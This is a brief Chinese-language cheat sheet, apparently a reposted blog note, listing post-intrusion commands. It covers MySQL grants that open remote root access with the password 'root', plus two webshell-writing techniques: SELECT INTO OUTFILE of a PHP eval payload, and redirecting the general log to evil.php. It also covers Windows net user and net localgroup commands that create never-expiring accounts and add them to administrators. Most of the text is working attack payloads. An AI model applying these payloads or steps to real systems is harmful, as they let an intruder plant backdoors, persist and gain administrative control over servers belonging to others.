标签:表示 use 安全设置 地址 expires set l数据库 ant 远程访问
总是忘记,自己整理。
GRANT ALL PRIVILEGES ON *.* TO ‘root‘@‘%‘ WITH GRANT OPTION; #开启mysql远程访问
GRANT ALL PRIVILEGES ON *.* TO root@"%" IDENTIFIED BY "root"; #开启mysql远程访问
show variables like ‘%secure%‘; #查看安全设置
查看是否支持secure_file_priv
select ‘<?php ($_=@$_GET[2]).@$_($_POST[1])?>‘ into outfile ‘D:\\phpStudy\\PHPTutorial\\WWW\\xx.php‘; #如果支持就可以 写入webshell
进入mysql数据库后 写入shell
show variables like ‘%general%‘; #查看配置
set global general_log = on; #开启general log模式
set global general_log_file = ‘E:/study/WWW/evil.php‘; #设置日志目录为shell地址
select ‘<?php eval($_GET[g]);?>‘ #写入shell
set global general_log=off; #关闭general log模式
添加一个指定用户名和密码的用户,/expires:never 表示帐户永不过期;
net user 用户名 密码 /add /expires:never
删除用户。
net user 用户名 /delete
将用户加入到指定的组中。
net localgroup 组 用户名 /add #加入组中
net localgroup 组 用户 /delete #从组中删除
将域用户添加到管理员组/从管理员组删除
net localgroup administrators 域\用户 /add
net localgroup administrators 域\用户 /delete
net user myuser /active:no 禁用 myuser 用户
net user myuser /active:yes 激活 myuser 用户
net user myuser /passwordchg:yes 用户 myuser 可以改变密码
net user myuser /passwordreq:yes 用户 myuser 必须拥有密码
net user myuser /expires:never 用户 myuser 永不过期
标签:表示 use 安全设置 地址 expires set l数据库 ant 远程访问
原文地址:https://www.cnblogs.com/jinjibird/p/13359095.html
